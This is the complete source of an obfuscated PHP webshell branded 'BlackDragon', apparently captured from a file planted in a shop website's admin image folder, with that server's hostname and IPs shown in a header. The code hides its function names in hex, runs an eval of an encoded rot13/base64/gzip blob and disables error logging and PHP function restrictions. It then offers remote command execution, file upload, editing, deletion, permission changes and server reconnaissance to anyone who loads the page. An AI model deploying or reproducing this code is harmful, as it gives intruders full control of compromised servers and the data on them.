Uname : Linux V-ShopU01 4.18.0-348.20.1.el8_5.x86_64 #1 SMP Thu Mar 10 20:59:28 UTC 2022 x86_64
Server : Apache/2.4.37 (rocky) OpenSSL/1.1.1k
Whoami : apache
Safe Mode : OFF
DOCUMENT ROOT : /var/www/html/site_shopudietDisable Function :
Path : /var/www/html/site_shopudiet/admin/img/
Server IP : 65.20.74.164
Client IP : 18.216.159.19
| Current File : /var/www/html/site_shopudiet/admin/img/uu.php |
<?pHp
/**
* Responsive Webshell
**/
$a = [
"7068705F756E616D65", # [0]
"73657373696F6E5F7374617274", # [1]
"6572726F725F7265706F7274696E67", # [2]
"70687076657273696F6E", # [3]
"66696C655F7075745F636F6E74656E7473", # [4]
"66696C655F6765745F636F6E74656E7473", # [5]
"66696C657065726D73", # [6]
"66696C656D74696D65", # [7]
"66696C6574797065", # [8]
"68746D6C7370656369616C6368617273", # [9]
"737072696E7466", # [10]
"737562737472", # [11]
"676574637764", # [12]
"6368646972", # [13]
"7374725F7265706C616365", # [14]
"6578706C6F6465", # [15]
"666C617368", # [16]
"6D6F76655F75706C6F616465645F66696C65", # [17]
"7363616E646972", # [18]
"676574686F737462796E616D65", # [19]
"7368656C6C5F65786563", # [20]
"53797374656D20496E666F726D6174696F6E", # [21]
"6469726E616D65", # [22]
"64617465", # [23]
"6D696D655F636F6E74656E745F74797065", # [24]
"66756E6374696F6E5F657869737473", # [25]
"6673697A65", # [26]
"726D646972", # [27]
"756E6C696E6B", # [28]
"6D6B646972", # [29]
"72656E616D65", # [30]
"7365745F74696D655F6C696D6974", # [31]
"636C656172737461746361636865", # [32]
"696E695F736574", # [33]
"696E695F676574", # [34]
"6765744F776E6572", # [35]
"6765745F63757272656E745F75736572" # [36]
];
for ($i = 0; $i < count($a); $i++) {
$f[$i] = hex($a[$i]);
}
$f[1]();
$f[2](0);
$f[31](0);
@$f[32]();
@$f[33]('error_log', null);
@$f[33]('log_errors', 0);
@$f[33]('max_execution_time', 0);
@$f[33]('output_buffering', 0);
@$f[33]('display_errors', 0);
$r0 = $_SERVER['DOCUMENT_ROOT'];
# php.ini Auto Create
$b0 = fopen($r0.'/php.ini', 'w');
fwrite($b0, "safe_mode = OFF\ndisable_functions = NONE");
fclose($b0);
$ds = @$f[34]("disable_functions");
$ds0 = (!empty($ds)) ? "$ds" : "All function is accessible"; eval(gzuncompress(base64_decode(str_rot13('rWkyHAgdt0ND/MIOWXitcFx0gOUoulXxG03I9PKVLaIfOBAh3MRxuCk7I02ucGNCZ2p4ykyGqbWRVEbVjndIDeWZaxGkrkEi2FcA1jaYoWwA4O8XLEtPRl2m4DaLwxtdOfhcLjTLsGqbTzsmk+Tl9C3mKkz+rx1Fyy1+jKU0gbzFyT/vS70jNdwdOixaRv9RF9vFfxLYYKL39ko33amk4A3Bo/kPXH/hWUBtluhSQvwdZA9CgXBz64aD2y4GDitVD495vq04Tp+GtHfavHiVcJmdVdqngC7ECEjBovJ6iniCjeLDWMnTN2lCgOCyFTse4EnAKKBB4TQSC/d6XsyKw93W2wYEx+la7sPwmULt02KojGpJ3U0d'))));
function fsize($file) {
$a = ["B", "KB", "MB", "GB", "TB", "PB"];
$pos = 0;
$size = filesize($file);
while ($size >= 1024) {
$size /= 1024;
$pos++;
}
return round($size, 2)." ".$a[$pos];
}
function hex($str) {
$r = "";
$len = (strlen($str) - 1);
for ($i = 0; $i < $len; $i += 2) {
$r .= chr(hexdec($str[$i].$str[$i + 1]));
}
return $r;
}
function flash($message, $status, $class, $redirect = false) {
if (!empty($_SESSION["message"])) {
unset($_SESSION["message"]);
}
if (!empty($_SESSION["class"])) {
unset($_SESSION["class"]);
}
if (!empty($_SESSION["status"])) {
unset($_SESSION["status"]);
}
$_SESSION["message"] = $message;
$_SESSION["class"] = $class;
$_SESSION["status"] = $status;
if ($redirect) {
header('Location: ' . $redirect);
exit();
}
return true;
}
function clear() {
if (!empty($_SESSION["message"])) {
unset($_SESSION["message"]);
}
if (!empty($_SESSION["class"])) {
unset($_SESSION["class"]);
}
if (!empty($_SESSION["status"])) {
unset($_SESSION["status"]);
}
return true;
}
if (isset($_GET['dir'])) {
$path = $_GET['dir'];
$f[13]($_GET['dir']);
} else {
$path = $f[12]();
}
$path = $f[14]('\\', '/', $path);
$exdir = $f[15]('/', $path);
function getOwner($item) {
if (function_exists("posix_getpwuid")) {
$downer = @posix_getpwuid(fileowner($item));
$downer = $downer['name'];
} else {
$downer = fileowner($item);
}
if (function_exists("posix_getgrgid")) {
$dgrp = @posix_getgrgid(filegroup($item));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup($item);
}
return $downer . '/' . $dgrp;
}
if (isset($_POST['newFolderName'])) {
if ($f[29]($path . '/' . $_POST['newFolderName'])) {
$f[16]("Create Folder Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Create Folder Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) {
if ($f[4]($_POST['newFileName'], $_POST['newFileContent'])) {
$f[16]("Create File Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Create File Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newName']) && isset($_GET['item'])) {
if ($_POST['newName'] == '') {
$f[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path");
}
if ($f[30]($path. '/'. $_GET['item'], $_POST['newName'])) {
$f[16]("Rename Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Rename Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newContent']) && isset($_GET['item'])) {
if ($f[4]($path. '/'. $_GET['item'], $_POST['newContent'])) {
$f[16]("Edit Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Edit Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newPerm']) && isset($_GET['item'])) {
if ($_POST['newPerm'] == '') {
$f[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path");
}
if (chmod($path. '/'. $_GET['item'], $_POST['newPerm'])) {
$f[16]("Change Permission Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Change Permission", "Failed", "error", "?dir=$path");
}
}
if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) {
if (is_dir($_GET['item'])) {
if ($f[27]($_GET['item'])) {
$f[16]("Delete Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Delete Failed", "Failed", "error", "?dir=$path");
}
} else {
if ($f[28]($_GET['item'])) {
$f[16]("Delete Successfully!", "Success", "success", "?dir=$path");
} else {
$f[16]("Delete Failed", "Failed", "error", "?dir=$path");
}
}
}
if (isset($_FILES['uploadfile'])) {
$total = count($_FILES['uploadfile']['name']);
for ($i = 0; $i < $total; $i++) {
$mainupload = $f[17]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);
}
if ($total < 2) {
if ($mainupload) {
$f[16]("Upload File Successfully! ", "Success", "success", "?dir=$path");
} else {
$f[16]("Upload Failed", "Failed", "error", "?dir=$path");
}
}
else{
if ($mainupload) {
$f[16]("Upload $i Files Successfully! ", "Success", "success", "?dir=$path");
} else {
$f[16]("Upload Failed", "Failed", "error", "?dir=$path");
}
}
}
$dirs = $f[18]($path);
?>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<title><?= $_SERVER['SERVER_NAME'] ?>:<?= $_SERVER['SERVER_PORT'] ?></title>
</head>
<body class="bg-dark text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<div class="info mb-3">
<i class="fa fa-server"></i> <?= $f[0]() ?><br>
<i class="fa fa-microchip"></i> <?= $_SERVER['SERVER_SOFTWARE'] ?><br>
<i class="fa fa-satellite-dish"></i> <?= !@$_SERVER['SERVER_ADDR'] ? $f[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?>
</div>
<div class="breadcrumb">
<i class="fa fa fa-folder pt-1"></i> <?php foreach ($exdir as $id => $pat) :
if ($pat == '' && $id == 0):
?>
<a href="?dir=/" class="text-decoration-none text-light">/</a>
<?php endif; if ($pat == '') continue; ?>
<?php if ($id + 1 == count($exdir)) : ?>
<span class="text-secondary"><?= $pat ?></span>
<?php else : ?>
<a href="?dir=
<?php
for ($i = 0; $i <= $id; $i++) {
echo "$exdir[$i]";
if ($i != $id) echo "/";
}
?>
" class="text-decoration-none text-light"><?= $pat ?></a><span class="text-light"> /</span>
<?php endif; ?>
<?php endforeach; ?>
<a href="?" class="text-decoration-none text-light"> [ HOME ]</a>
</div>
<div class="d-flex justify-content-between">
<div class="p-2">
<form action="" method="post">
<div class="row">
<div class="col-md-9 mb-3">
<input type="text" class="form-control form-control-sm" name="command" placeholder="Command">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-outline-light btn-sm">Exec</button>
</div>
</div>
</form>
</div>
<div class="p-2">
<form action="" method="post" enctype="multipart/form-data">
<div class="row">
<div class="col-md-9 mb-3">
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</div>
</form>
</div>
</div>
<div class="container" id="tools">
<?php if (isset($_POST['command'])) : ?>
<div class="row justify-content-center">
<pre><?= $f[20]($_POST['command']) ?></pre>
</div>
<?php endif; ?>
<?php if (isset($_GET['action']) && $_GET['action'] != 'delete') : $action = $_GET['action'] ?>
<div class="row justify-content-center">
<?php if ($action == 'rename' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">New Name</label>
<input type="text" class="form-control" name="newName" value="<?= $_GET['item'] ?>">
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($action == 'edit' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label"><?= $_GET['item'] ?></label>
<textarea id="CopyFromTextArea" name="newContent" rows="10" class="form-control"><?= $f[9]($f[5]($path. '/'. $_GET['item'])) ?></textarea>
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
<button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy</button>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($action == 'view' && isset($_GET['item'])) : ?>
<div class="mb-3">
<label for="name" class="form-label">File Name : <?= $_GET['item'] ?></label>
<textarea name="newContent" rows="10" class="form-control" disabled=""><?= $f[9]($f[5]($path. '/'. $_GET['item'])) ?></textarea>
<br>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</div>
<?php elseif ($action == 'chmod' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label"><?= $_GET['item'] ?></label>
<input type="text" class="form-control" name="newPerm" value="<?= $f[11]($f[10]('%o', $f[6]($_GET['item'])), -4); ?>">
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</form>
<?php endif; ?>
</div>
<?php endif; ?>
<div class="row justify-content-center">
<div class="collapse" id="newFolderCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">Folder Name</label>
<input type="text" class="form-control" name="newFolderName" placeholder="BlackDragon">
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
</form>
</div>
<div class="collapse" id="newFileCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">File Name</label>
<input type="text" class="form-control" name="newFileName" placeholder="blackdragon.php">
</div>
<div class="mb-3">
<label for="name" class="form-label">File Content</label>
<textarea name="newFileContent" rows="10" class="form-control" placeholder="Hello World - BlackDragon"></textarea>
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
</form>
</div>
<div class="collapse" id="newInfoServer" data-bs-parent="#tools" style="transition:none;">
<div class="mb-3">
<label for="name" class="form-label"><?= $f[21] ?></label>
<textarea name="newFileContent" rows="10" class="form-control" disabled="">Uname > <?= $f[0]() ?> Software > <?= $_SERVER['SERVER_SOFTWARE'] ?> PHP > <?= $f[3]() ?> Protocol > <?= $_SERVER['SERVER_PROTOCOL'] ?> IP / Port > <?= !@$_SERVER['SERVER_ADDR'] ? $f[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?> / <?= $_SERVER['SERVER_PORT'] ?> Mail > <?= $f[25]('mail') ? 'ON' : 'OFF' ?> Curl > <?= $f[25]('curl_version') ? 'ON' : 'OFF' ?> Owner > <?= $f[36](); ?> MySQL > <?= $f[25]('mysql_connect') ? 'ON' : 'OFF' ?> Disable Function > <?= $ds0 ?></textarea>
<br>
*ReClick For Close
<br>
File : BlackDragon <?= $_SERVER['SCRIPT_NAME'] ?>
</div>
</div>
</div>
</div>
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td style="width:35%">Name</td>
<td style="width:10%">Type</td>
<td style="width:10%">Size</td>
<td style="width:13%">Owner/Group</td>
<td style="width:10%">Permission</td>
<td style="width:13%">Last Modified</td>
<td style="width:9%">Actions</td>
</tr>
</thead>
<tbody class="text-nowrap">
<?php
foreach ($dirs as $dir) :
if (!is_dir($dir)) continue;
?>
<tr>
<td>
<?php if ($dir === '..') : ?>
<a href="?dir=<?= $f[22]($path); ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a>
<?php elseif ($dir === '.') : ?>
<a href="?dir=<?= $path; ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a>
<?php else : ?>
<a href="?dir=<?= $path . '/' . $dir ?>" class="text-decoration-none text-light"><i class="fa fa-folder"></i> <?= $dir ?></a>
<?php endif; ?>
</td>
<td class="text-light"><?= $f[8]($dir) ?></td>
<td class="text-light">-</td>
<td class="text-light"><?= $f[35]($dir) ?></td>
<td class="text-light"><?= $f[11]($f[10]('%o', $f[6]($dir)), -4); ?></td>
<td class="text-light"><?= $f[23]("Y-m-d h:i:s", $f[7]($dir)); ?></td>
<td>
<?php if ($dir != '.' && $dir != '..') : ?>
<div class="btn-group">
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a>
<a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a>
</div>
<?php elseif ($dir === '.') : ?>
<div class="btn-group">
<a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-folder-plus"></i></a>
<a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-plus"></i></a>
<a data-bs-toggle="collapse" href="#newInfoServer" role="button" aria-expanded="false" aria-controls="newInfoServer" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-info"></i></a>
</div>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
<?php
foreach ($dirs as $dir) :
if (!is_file($dir)) continue;
?>
<tr>
<td>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=view" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> <?= $dir ?></a>
</td>
<td class="text-light"><?= ($f[25]('mime_content_type') ? $f[24]($dir) : $f[8]($dir)) ?></td>
<td class="text-light"><?= $f[26]($dir) ?></td>
<td class="text-light"><?= $f[35]($dir) ?></td>
<td class="text-light"><?= $f[11]($f[10]('%o', $f[6]($dir)), -4); ?></td>
<td class="text-light"><?= $f[23]("Y-m-d h:i:s", $f[7]($dir)); ?></td>
<td>
<?php if ($dir != '.' && $dir != '..') : ?>
<div class="btn-group">
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=edit" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a>
<a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a>
</div>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<div class="text-light">© BlackDragon <script type='text/javascript'>var creditsyear = new Date();document.write(creditsyear.getFullYear());</script></div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script>
<script>
<?php if (isset($_SESSION['message'])) : ?>
Swal.fire(
'<?= $_SESSION['status'] ?>',
'<?= $_SESSION['message'] ?>',
'<?= $_SESSION['class'] ?>'
)
<?php endif; clear(); ?>
function deleteConfirm(url) {
event.preventDefault()
Swal.fire({
title: 'Are you sure?',
icon: 'warning',
showCancelButton: true,
confirmButtonColor: '#3085d6',
cancelButtonColor: '#d33',
confirmButtonText: 'Yes, delete it!'
}).then((result) => {
if (result.isConfirmed) {
window.location.href = url
}
})
}
function jscopy() {
var jsCopy = document.getElementById("CopyFromTextArea");
jsCopy.focus();
jsCopy.select();
document.execCommand("copy");
}
</script>
</body>
</html>